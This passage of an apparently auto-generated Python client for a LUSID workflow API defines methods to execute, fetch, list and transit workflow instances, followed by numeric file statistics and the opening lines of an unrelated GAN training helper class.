:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: WorkflowInstance
"""
kwargs['_return_http_data_only'] = True
return self.execute_workflow_with_http_info(workflow_code, execute_workflow_request, **kwargs) # noqa: E501
def execute_workflow_with_http_info(self, workflow_code, execute_workflow_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Execute workflow # noqa: E501
This will create a new workflow instance for the specified workflow # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.execute_workflow_with_http_info(workflow_code, execute_workflow_request, async_req=True)
>>> result = thread.get()
:param workflow_code: Workflow Code (required)
:type workflow_code: str
:param execute_workflow_request: Data associated with execute request (required)
:type execute_workflow_request: ExecuteWorkflowRequest
:param correlation_id: Optional. This id can be used to correlate a workflow instance with any entity (e.g. a custom entity or other workflow instance) and also to retrieve and transit workflow instances
:type correlation_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'workflow_code',
'execute_workflow_request',
'correlation_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method execute_workflow" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'workflow_code' is set
if self.api_client.client_side_validation and ('workflow_code' not in local_var_params or # noqa: E501
local_var_params['workflow_code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `workflow_code` when calling `execute_workflow`") # noqa: E501
# verify the required parameter 'execute_workflow_request' is set
if self.api_client.client_side_validation and ('execute_workflow_request' not in local_var_params or # noqa: E501
local_var_params['execute_workflow_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `execute_workflow_request` when calling `execute_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_code' in local_var_params:
path_params['workflowCode'] = local_var_params['workflow_code'] # noqa: E501
query_params = []
if 'correlation_id' in local_var_params and local_var_params['correlation_id'] is not None: # noqa: E501
query_params.append(('correlationId', local_var_params['correlation_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'execute_workflow_request' in local_var_params:
body_params = local_var_params['execute_workflow_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.1.25'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "WorkflowInstance",
400: "LusidValidationProblemDetails",
404: "str",
}
return self.api_client.call_api(
'/api/v1/workflows/{workflowCode}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_workflow_instance(self, workflow_instance_id, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get workflow instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_instance(workflow_instance_id, async_req=True)
>>> result = thread.get()
:param workflow_instance_id: Unique workflow instance identifier (required)
:type workflow_instance_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: WorkflowInstance
"""
kwargs['_return_http_data_only'] = True
return self.get_workflow_instance_with_http_info(workflow_instance_id, **kwargs) # noqa: E501
def get_workflow_instance_with_http_info(self, workflow_instance_id, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get workflow instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_instance_with_http_info(workflow_instance_id, async_req=True)
>>> result = thread.get()
:param workflow_instance_id: Unique workflow instance identifier (required)
:type workflow_instance_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'workflow_instance_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_workflow_instance" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'workflow_instance_id' is set
if self.api_client.client_side_validation and ('workflow_instance_id' not in local_var_params or # noqa: E501
local_var_params['workflow_instance_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `workflow_instance_id` when calling `get_workflow_instance`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_instance_id' in local_var_params:
path_params['workflowInstanceId'] = local_var_params['workflow_instance_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "WorkflowInstance",
400: "LusidValidationProblemDetails",
404: "str",
}
return self.api_client.call_api(
'/api/v1/workflows/instances/{workflowInstanceId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def get_workflow_instance_by_correlation_id(self, correlation_id, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get workflow instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_instance_by_correlation_id(correlation_id, async_req=True)
>>> result = thread.get()
:param correlation_id: CorrelationId associated with the workflow instance (required)
:type correlation_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: WorkflowInstance
"""
kwargs['_return_http_data_only'] = True
return self.get_workflow_instance_by_correlation_id_with_http_info(correlation_id, **kwargs) # noqa: E501
def get_workflow_instance_by_correlation_id_with_http_info(self, correlation_id, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get workflow instance # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_instance_by_correlation_id_with_http_info(correlation_id, async_req=True)
>>> result = thread.get()
:param correlation_id: CorrelationId associated with the workflow instance (required)
:type correlation_id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'correlation_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_workflow_instance_by_correlation_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'correlation_id' is set
if self.api_client.client_side_validation and ('correlation_id' not in local_var_params or # noqa: E501
local_var_params['correlation_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `correlation_id` when calling `get_workflow_instance_by_correlation_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'correlation_id' in local_var_params:
path_params['correlationId'] = local_var_params['correlation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "WorkflowInstance",
400: "LusidValidationProblemDetails",
404: "str",
}
return self.api_client.call_api(
'/api/v1/workflows/instance/{correlationId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def list_workflow_instances(self, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get workflow instances # noqa: E501
If no parameters are passed then all instances will be returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_workflow_instances(async_req=True)
>>> result = thread.get()
:param workflow_code: Optional. Workflow code
:type workflow_code: str
:param workflow_execution_status: Optional. Workflow execution status
:type workflow_execution_status: str
:param workflow_instance_state: Optional. Custom state associated with workflow instance
:type workflow_instance_state: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ResourceListOfWorkflowInstance
"""
kwargs['_return_http_data_only'] = True
return self.list_workflow_instances_with_http_info(**kwargs) # noqa: E501
def list_workflow_instances_with_http_info(self, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get workflow instances # noqa: E501
If no parameters are passed then all instances will be returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_workflow_instances_with_http_info(async_req=True)
>>> result = thread.get()
:param workflow_code: Optional. Workflow code
:type workflow_code: str
:param workflow_execution_status: Optional. Workflow execution status
:type workflow_execution_status: str
:param workflow_instance_state: Optional. Custom state associated with workflow instance
:type workflow_instance_state: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ResourceListOfWorkflowInstance, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'workflow_code',
'workflow_execution_status',
'workflow_instance_state'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_workflow_instances" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'workflow_code' in local_var_params and local_var_params['workflow_code'] is not None: # noqa: E501
query_params.append(('workflowCode', local_var_params['workflow_code'])) # noqa: E501
if 'workflow_execution_status' in local_var_params and local_var_params['workflow_execution_status'] is not None: # noqa: E501
query_params.append(('workflowExecutionStatus', local_var_params['workflow_execution_status'])) # noqa: E501
if 'workflow_instance_state' in local_var_params and local_var_params['workflow_instance_state'] is not None: # noqa: E501
query_params.append(('workflowInstanceState', local_var_params['workflow_instance_state'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfWorkflowInstance",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/v1/workflows/instances', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def list_workflows(self, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get all available workflows # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_workflows(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: ResourceListOfWorkflow
"""
kwargs['_return_http_data_only'] = True
return self.list_workflows_with_http_info(**kwargs) # noqa: E501
def list_workflows_with_http_info(self, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Get all available workflows # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_workflows_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ResourceListOfWorkflow, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_workflows" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ResourceListOfWorkflow",
}
return self.api_client.call_api(
'/api/v1/workflows', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def transit_workflow(self, workflow_instance_id, transit_workflow_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Transit workflow # noqa: E501
This would transit the workflow instance to proceed to next step using WorkflowInstanceId with the attached data/context and action # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.transit_workflow(workflow_instance_id, transit_workflow_request, async_req=True)
>>> result = thread.get()
:param workflow_instance_id: Unique workflow instance identifier (required)
:type workflow_instance_id: str
:param transit_workflow_request: Data associated with the transit request (required)
:type transit_workflow_request: TransitWorkflowRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: WorkflowInstance
"""
kwargs['_return_http_data_only'] = True
return self.transit_workflow_with_http_info(workflow_instance_id, transit_workflow_request, **kwargs) # noqa: E501
def transit_workflow_with_http_info(self, workflow_instance_id, transit_workflow_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Transit workflow # noqa: E501
This would transit the workflow instance to proceed to next step using WorkflowInstanceId with the attached data/context and action # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.transit_workflow_with_http_info(workflow_instance_id, transit_workflow_request, async_req=True)
>>> result = thread.get()
:param workflow_instance_id: Unique workflow instance identifier (required)
:type workflow_instance_id: str
:param transit_workflow_request: Data associated with the transit request (required)
:type transit_workflow_request: TransitWorkflowRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'workflow_instance_id',
'transit_workflow_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method transit_workflow" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'workflow_instance_id' is set
if self.api_client.client_side_validation and ('workflow_instance_id' not in local_var_params or # noqa: E501
local_var_params['workflow_instance_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `workflow_instance_id` when calling `transit_workflow`") # noqa: E501
# verify the required parameter 'transit_workflow_request' is set
if self.api_client.client_side_validation and ('transit_workflow_request' not in local_var_params or # noqa: E501
local_var_params['transit_workflow_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `transit_workflow_request` when calling `transit_workflow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'workflow_instance_id' in local_var_params:
path_params['workflowInstanceId'] = local_var_params['workflow_instance_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'transit_workflow_request' in local_var_params:
body_params = local_var_params['transit_workflow_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.1.25'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "WorkflowInstance",
400: "LusidValidationProblemDetails",
404: "str",
}
return self.api_client.call_api(
'/api/v1/workflows/instances/{workflowInstanceId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def transit_workflow_by_correlation_id(self, correlation_id, transit_workflow_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Transit workflow # noqa: E501
This would transit the workflow instance to proceed to next step using CorrelationId with the attached data/context and action # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.transit_workflow_by_correlation_id(correlation_id, transit_workflow_request, async_req=True)
>>> result = thread.get()
:param correlation_id: CorrelationId associated with the workflow instance (required)
:type correlation_id: str
:param transit_workflow_request: Data associated with the transit request (required)
:type transit_workflow_request: TransitWorkflowRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: WorkflowInstance
"""
kwargs['_return_http_data_only'] = True
return self.transit_workflow_by_correlation_id_with_http_info(correlation_id, transit_workflow_request, **kwargs) # noqa: E501
def transit_workflow_by_correlation_id_with_http_info(self, correlation_id, transit_workflow_request, **kwargs): # noqa: E501
"""[EXPERIMENTAL] Transit workflow # noqa: E501
This would transit the workflow instance to proceed to next step using CorrelationId with the attached data/context and action # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.transit_workflow_by_correlation_id_with_http_info(correlation_id, transit_workflow_request, async_req=True)
>>> result = thread.get()
:param correlation_id: CorrelationId associated with the workflow instance (required)
:type correlation_id: str
:param transit_workflow_request: Data associated with the transit request (required)
:type transit_workflow_request: TransitWorkflowRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(WorkflowInstance, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'correlation_id',
'transit_workflow_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method transit_workflow_by_correlation_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'correlation_id' is set
if self.api_client.client_side_validation and ('correlation_id' not in local_var_params or # noqa: E501
local_var_params['correlation_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `correlation_id` when calling `transit_workflow_by_correlation_id`") # noqa: E501
# verify the required parameter 'transit_workflow_request' is set
if self.api_client.client_side_validation and ('transit_workflow_request' not in local_var_params or # noqa: E501
local_var_params['transit_workflow_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `transit_workflow_request` when calling `transit_workflow_by_correlation_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'correlation_id' in local_var_params:
path_params['correlationId'] = local_var_params['correlation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'transit_workflow_request' in local_var_params:
body_params = local_var_params['transit_workflow_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json-patch+json', 'application/json', 'text/json', 'application/*+json']) # noqa: E501
# set the LUSID header
header_params['X-LUSID-SDK-Language'] = 'Python'
header_params['X-LUSID-SDK-Version'] = '0.1.25'
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "WorkflowInstance",
400: "LusidValidationProblemDetails",
404: "str",
}
return self.api_client.call_api(
'/api/v1/workflows/instance/{correlationId}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
| 46.619137
| 211
| 0.617937
| 5,410
| 49,696
| 5.403142
| 0.045471
| 0.033116
| 0.051247
| 0.025863
| 0.965824
| 0.963942
| 0.952756
| 0.949711
| 0.932982
| 0.916938
| 0
| 0.012629
| 0.313265
| 49,696
| 1,065
| 212
| 46.662911
| 0.843882
| 0.472372
| 0
| 0.742616
| 1
| 0
| 0.225149
| 0.086017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031646
| false
| 0
| 0.010549
| 0
| 0.07384
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5170d937fa6d2e80e0c937a48caf5fe62b3ec90c
| 13,439
|
py
|
Python
|
driver/helper/SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty.py
|
qgking/FRGAN
|
b6a250c46981707c43c3889f80d8cc3ec31edaaf
|
[
"MIT"
] | 2
|
2021-08-10T02:38:23.000Z
|
2021-08-10T03:04:22.000Z
|
driver/helper/SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty.py
|
qgking/FRGAN
|
b6a250c46981707c43c3889f80d8cc3ec31edaaf
|
[
"MIT"
] | 1
|
2022-02-21T15:57:03.000Z
|
2022-02-21T15:57:03.000Z
|
driver/helper/SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty.py
|
qgking/FRGAN
|
b6a250c46981707c43c3889f80d8cc3ec31edaaf
|
[
"MIT"
] | 2
|
2021-11-07T13:25:51.000Z
|
2022-01-18T07:09:30.000Z
|
from tumor_data.SYNDataLoader import *
from tensorboardX import SummaryWriter
from torchsummaryX import summary
from driver.helper.base_syn_helper import BaseTrainHelper
class SYNHelper_Dilate_Gate_Richer_Lcon_Lpercep_Lsty(BaseTrainHelper):
def __init__(self, generator, discriminator,
criterions, config):
